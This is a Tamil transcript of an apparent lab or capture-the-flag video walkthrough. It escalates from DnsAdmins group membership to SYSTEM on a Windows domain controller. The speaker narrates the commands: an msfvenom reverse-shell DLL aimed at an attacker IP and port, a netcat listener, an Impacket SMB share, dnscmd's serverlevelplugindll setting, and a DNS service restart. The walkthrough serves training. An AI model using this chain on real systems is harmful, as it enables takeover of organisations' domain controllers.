ஆம் ஐ ப்ரிவ்ஸ் அப்படின்னு கொடுக்கலாம். இல்லைனா ஹூ ஆம் ஐ ஆல் அப்படின்னு கொடுத்தீங்கன்னா அந்த பர்டிகுலர் யூசருடைய எல்லா டீட்டெயில்ஸும் நீங்கள் வந்து பார்க்கலாம். ஸோ இங்கே வந்து பார்த்தீங்கன்னா இந்த பர்டிகுலர் ரியானுடைய யூசர் நேம் அண்ட் அவனுடைய எஸ்ஐடி வந்து இங்கே இருக்குது. குரூப் சம்மந்தப்பட்ட இன்ஃபர்மேஷன் வந்து கீழே இருக்குது. எந்தெந்த குரூப்ஸ்க்கு வந்து இவன் வந்து மெம்பராக இருக்கான். ஸோ ஒன் ஆஃப் தி இம்பார்ட்டன்ட் குரூப் வந்து இந்த டிஎன்எஸ் அட்மின்ஸ் அப்படிங்கிற குரூப் தான். ஸோ இந்த டிஎன்எஸ் அட்மின்ஸ் குரூப் உடைய அக்கௌண்ட்டை வந்து நீங்கள் வந்து காம்ப்ரமைஸ் பண்ணியிருந்தால் நீங்கள் வந்து இந்த டொமைன் கண்ட்ரோலரை வந்து டேக் ஓவர் பண்ணுறது ரொம்ப ஈஸி. ஸோ இது வந்து ஆக்சுவலாக வல்னரபிலிட்டி கிடையாது, இது வந்து ஒரு மிஸ்கான்ஃபிகரேஷன் தான். ஸோ இது வந்து நிறைய வருஷம் அது இதை வந்து ரிப்போர்ட் பண்ணி மைக்ரோசாஃப்ட்டுக்கு. ஸோ மைக்ரோசாஃப்ட் வந்து என்ன சொல்லியிருக்காங்கன்னா, இது வந்து திஸ் இஸ் ஒர்க்கிங் ஆஸ் இன்டெண்டட், அதாவது இது வந்து ஒரு வல்னரபிலிட்டி இல்லை, எங்களுடைய இம்ப்ளிமெண்டேஷனே இப்படி தான், இது வந்து ஒரு மிஸ்கான்ஃபிகரேஷன் கூட இல்லை. ஸோ நாம் வந்து எப்போவுமே ஒரு டிஎன்எஸ் அட்மின்ஸ் வந்து ரொம்ப க்ருஷியலான இம்பார்ட்டண்ட்டான யூசர்ஸ்க்கு தான் நாம் வந்து ப்ரிவிலேஜஸ் கொடுக்கணும். ஸோ அவங்களுடைய அக்கௌண்ட்ஸ் வந்து ரொம்ப சேஃப் கார்ட் பண்ணி வச்சுருக்கணும்.
ஆனால் இங்கே வந்து நமக்கு வந்து ஆல்ரெடி டிஎன்எஸ் அட்மின்ஸோடைய பெர்மிஷன்ஸ் வந்து ரியானுக்கு இருக்குது. ஸோ இதை வச்சு நாம் வந்து எப்படி டொமைன் கண்ட்ரோலை வந்து டேக் ஓவர் பண்ணலான்னு தான் இப்போ நம்ம பார்க்க போகிறோம். ஸோ இது வந்து நீங்கள் சிம்பிள் கூகுள் சர்ச் பண்ணிங்கன்னா, அதாவது how to take over domain controller using DNS admins group or from DNS admins to domain controller அப்படின்னு சர்ச் பண்ணிங்கன்னா, ஸோ அதில் ஒன் ஆஃப் தி லிங்க் வந்து adsecurity.org. ஸோ இதை பற்றி நான் ஏற்கனவே சொல்லியிருக்கேன். இந்த adsecurity பிளாக் இருக்குது. ஸோ இந்த பிளாக்ல ஆக்டிவ் டைரக்டரியோடைய செக்யூரிட்டி எல்லாம் அட்டாக்ஸும் எக்ஸ்பிளைன் பண்ணியிருக்காங்க. ரொம்ப நாள் பிளாக். அது மட்டும் இல்லாமல் இப்போ பார்த்தீங்கன்னா டிஎன்எஸ் அட்மின் டு டொமைன் அட்மின் நிறைய லிங்க்ஸ் இருக்குது. அபிசர்த் இருக்குது, ஏடி செக்யூரிட்டி இருக்குது, ஐரெட் டீம், நிறைய மீடியம் பிளாக்ஸ் இருக்குது, வீடியோஸ் இருக்குது. ஸோ இன் ஷார்ட் வந்து சொல்லணுன்னா டிஎன்எஸ் மேனேஜ்மெண்ட் வந்து வயா ஆர்பிசியில் வந்து நடக்குது. ஸோ மைக்ரோசாஃப்ட் ப்ரோட்டோகால்ஸில் வந்து சர்வர் லெவல் ப்ளக்இன் டிஎல்எல் ஆப்ரேஷன் வந்து இருக்குது. ஸோ இந்த சர்வர் லெவல் ப்ளக்இன் டிஎல்எல் ஆப்ரேஷன் வந்து என்னென்னா, ஒரு ரிமோட் டிஎல்எல்லை வந்து நாம் வந்து இம்போர்ட் பண்ணிக்கலாம் வித்தவுட் எனி வெரிஃபிகேஷன் ஆஃப் தி டிஎல்எல் பாத். ஸோ அதாவது நாம் வந்து ஒரு மலிஷியஸ் எஸ்எம்பி ஷேரை வந்து அந்த ஷேரில் டிஎல்எல், அதாவது ரிவர்ஸ் ஷெல் மெட்டாஸ்பிளாட்டோடைய ஷெல்லை வந்து டிஎல்எல் ஃபார்மேட்டில் சேவ் பண்ணி, ஸோ அதை வந்து அந்த பாத் வந்து இங்கே செட் பண்ணலாம் நாம். ஸோ இங்கே பார்த்தீங்கன்னா அந்த கமாண்ட் வந்து இங்கே இருக்குது எப்படி செட் பண்ணணும்னு. ஆக்சுவலாக இந்த பாதை தான் அவங்க வந்து ப்ராப்பராக வேலிடேஷன் பண்ணலன்னு சொல்ல முடியாது, அவங்க அப்படி தான் இம்ப்ளிமெண்ட் பண்ணி வச்சுருக்காங்க. ஸோ ஒன்ஸ் அது செட் பண்ண உடனே இந்த பர்டிகுலர் ரிஜிஸ்ட்ரி கீ வந்து செட் ஆகிடும். அதாவது ஹெச்கேஎல்எம்மில் இந்த பர்டிகுலர் லொக்கேஷனில் நம்மளுடைய சர்வர் லெவல் ப்ளக்இன் டிஎல்எல். ஸோ ஒன்ஸ் இந்த கீக்கு நம்மளுடைய டிஎல்எல்லுடைய பாத் வேல்யூ வந்து செட் ஆச்சுன்னா, நாம் வந்து ஜஸ்ட் அந்த டிஎன்எஸ் சர்வீஸை ஸ்டாப் அண்ட் ஸ்டார்ட் பண்ணோன்னா, அதாவது ஜஸ்ட் ரீஸ்டார்ட் பண்ணோன்னா எப்படி லினக்ஸில் நாம் வந்து சர்வீஸ் ரீஸ்டார்ட் பண்ணுறோமோ அதே மாதிரி விண்டோஸில் வந்து அந்த பர்டிகுலர் டிஎன்எஸ் சர்வீஸை வந்து ரீஸ்டார்ட் பண்ணுறோம். ஸோ ரீஸ்டார்ட் பண்ண உடனே அந்த பர்டிகுலர் டிஎல்எல் வந்து எக்ஸிக்யூட் ஆகும், அதாவது சிஸ்டம் ப்ரிவிலேஜில். ஸோ சிஸ்டம் ப்ரிவிலேஜில் ரன் பண்ணுறதுனால நம்மளுக்கு வந்து சிஸ்டம் ரூட் ஷெல் வந்து கிடைக்குது. ஸோ இதை தான் நாம் வந்து இப்போ வந்து பார்க்க போகிறோம். ஸோ கண்ட்ரோல் பிசெட். ஸோ ஃபஸ்ட்டு ஸோ இதுக்கு நாம் வந்து எம்எஸ்எஃப் வெனம் பேலோட வந்து ஜென்ரேட் பண்ணலாம். ஸோ எம்எஸ்எஃப் வெனம் பேலோட் விண்டோஸ் x64, ஏன்னா இது ஒரு 64 பிட் மிஷின் இது. ஸோ ஷெல் ரிவர்ஸ் டிசிபி, ஷெல் ரிவர்ஸ் டிசிபி. ஸோ எல்லோஸ்ட் வந்து செட் பண்ணணும். ஸோ ஐஎஃப் கான்ஃபிக் 10.0 10.14.138. Lhost is equal to 10.14.138 and lport is equal to நான் வந்து 5555ல ரன் பண்ணோம். அப்புறமா இந்த பர்டிகுலர் ஃபார்மேட் வந்து டிஎல்எல் ஃபார்மேட்டில் வந்து எனக்கு வந்து அவுட்புட்டாக வேணும். ஸோ அதனால் -f redirect to நான் வந்து plugin.dll அப்படின்னு சேவ் பண்ணுறேன். ஸோ இப்போ வந்து இந்த பர்டிகுலர் பேலோட் .dll ஃபைலில் வந்து ஒரு ரிவர்ஸ் டிசிபி ஷெல் வந்து ரைட் பண்ணிக்கிட்டு இருக்கு. இப்போ எல்ஹோஸ்ட் வந்து நம்மளுடைய ஐபி அண்ட் எல்போர்ட் வந்து நம்மளுடைய 555 போர்ட். ஸோ இப்போ வந்து நாம் லிசனிங் ஸ்டேட்டுக்கு போகலாம். ஸோ என்சி NLVP 5555. ஸோ எல்எஸ். ஸோ இங்கே பார்த்தீங்கன்னா 460 பைட்ஸ் இருக்குது. ஸோ இப்போ வந்து நாம் என்ன பண்ணுறோன்னா, அந்த பர்டிகுலர் ஷேரை வந்து டிஎன்எஸ் வந்து ஆக்சஸ் பண்ணுறதுனால நாம் வந்து ஒரு எஸ்எம்பி ஷேரை வந்து க்ரியேட் பண்ணணும். ஸோ லொக்கேட் எஸ்எம்பி server.py, அதாவது இம்பேக்கெட்டில் இருக்க நிறைய ஸ்கிரிப்ட். ஸோ எஸ்எம்பி server.py நிறைய இடத்துல வச்சுருக்கேன். ஸோ எக்ஸாம்பிள் அந்த லொக்கேஷனுக்கு போகலாம், தேவையில்லை. ஸோ பைத்தன் எஸ்எம்பி server.py. ஸோ நான் வந்து சிவி சைபர் பிளாக் ஹோல் அப்படிங்கிற ஷேரை வந்து க்ரியேட் பண்ணுறேன். என்னுடைய கரண்ட் டைரக்டரியை வந்து நான் வந்து ஷேர் பண்ண போகிறேன். ஸோ இப்போ பார்த்தீங்கன்னா நம்மளுடைய எஸ்எம்பி சர்வர் வந்து ரன்னிங்கில் இருக்குது.
ரிவர்ஷலும் ரெடியாக இருக்குது. இப்போ ஜஸ்ட் நாம் வந்து அந்த பர்டிகுலர் ப்ளகினை வந்து ட்ரான்ஸ்ஃபர் பண்ணணும். ஸோ இதுக்கு வந்து டிஎன்எஸ் கமாண்ட் வந்து ஆல்ரெடி இருக்குது அந்த பிளாக்கில் எக்ஸ்பிளைன் பண்ண மாதிரி. ஸோ டிஎன்எஸ் கமாண்ட் கான்ஃபிக் சர்வர் லெவல் ப்ளகின் டிஎல்எல். ஸோ டிஎன்எஸ் கமாண்ட் கான்ஃபிக் சர்வர் லெவல் ப்ளகின் டிஎல்எல். ஸோ இப்போ நான் மேக்ஸிமைஸ் பண்ணிக்கிறேன். ஸோ இங்கே வந்து என்னுடைய ஐபி 10.10.14.38 138 தானா? ஆமாம் 138. அப்புறமா தப்பிச்சுன்னா ஃபஸ்ட்லேருந்து வரணும். ஸோ 138 அண்ட் ஷேர் வந்து சிபி. ஸோ ஷேர் வந்து சிபி. டெர்மினல் மெஸ்அப் ஆகிடுச்சு. ஓகே, நோ ப்ராப்ளம். ஸோ plugin.dl. ஸோ இப்போ பார்த்தீங்கன்னா ரிஜிஸ்ட்ரி ப்ராப்பர்ட்டி செட், அதாவது சர்வர் லெவல் plugin DLL வந்து செட் ஆகிடுச்சு. ஸோ இதை நம்ம வெரிஃபை பண்ணுறதுக்கு இந்த பர்டிகுலர் நீங்கள் வந்து query பண்ணலாம். ஸோ கெட் ஐட்டம் கீ ஆர் சம்திங் ஏதோ ஒரு கமாண்ட் இருக்குது, மறந்து போச்சு. ஸோ அதை வச்சு நீங்கள் வந்து இந்த பர்டிகுலர் கீக்கு வந்து நம்மளுடைய வேல்யூ வந்து செட்டாக இருக்கா இல்லையான்னு தெரிஞ்சுக்கலாம். ஸோ இப்போ நான் வந்து ஜஸ்ட் ஸ்டாப் அண்ட் அந்த சர்வீஸை ஸ்டாப் அண்ட் ஸ்டார்ட் பண்ணோன்னா நமக்கு ஷெல் வந்து கிடைக்கும். ஸோ இதுக்கு sc.txt வந்து யூஸ் பண்ணலாம். ஸோ ஸ்டாப் டிஎன்எஸ். ஸோ இப்போ வந்து நான் ஸ்டார்ட் பண்ணுறேன். ஸ்டார்ட் டிஎன்எஸ், அதாவது ரீஸ்டார்ட் பண்ணுறேன். ஸோ இங்கே ரைட் சைடில் பார்த்தீங்கன்னா ஆக்சஸ் பண்ணியிருக்க நம்மளுடைய டிஎல்எல் வந்து லோட் ஆகிடுச்சு அப்படிங்கிறதுக்காக மீனிங். ஸோ இங்கே பார்த்தீங்கன்னா சிஸ்டம் ஷெல்லில் வந்து நம்மளுக்கு வந்து ரைட் சைடில் வந்து கிடச்சிருக்கு. ஸோ Ctrl+BZ சிஸ்டம் 32 அட்மினிஸ்ட்ரேஷன் ப்ரிவிலேஜஸ் வந்து அட்டைன் பண்ணியாச்சு. ஸோ இப்படி தான் இந்த மிஷினை வந்து காம்ப்ரமைஸ் பண்ண முடிஞ்சது. ஸோ இது வந்து ரொம்ப ஈஸியாக இருக்குது. அதாவது காமன் மிஸ்கான்ஃபிகரேஷன் நிறைய பிளாக்ஸ் இருக்குது. ஆனால் ஸ்டார்டிங்கில் ரொம்ப நேரம் ஸ்டக் ஆகிட்டு இருந்தேன். அந்த enum4linux வந்து டிஸ்கிரிப்ஷனில் வந்து பாஸ்வேர்டு இருந்தனால நிறைய பேர் அங்கே தான் ஸ்டக்காக இருந்தாங்க. ஸோ நான் வந்து ட்ரை ஹேக்மி, ஸோ அதை வந்து ஸ்டார்ட் பண்ணலான்ட்டு யோசிச்சுக்கிட்டு இருக்கேன். ஓகே, நெக்ஸ்ட் வீடியோவில் பார்க்கலாம். தேங்க்ஸ்.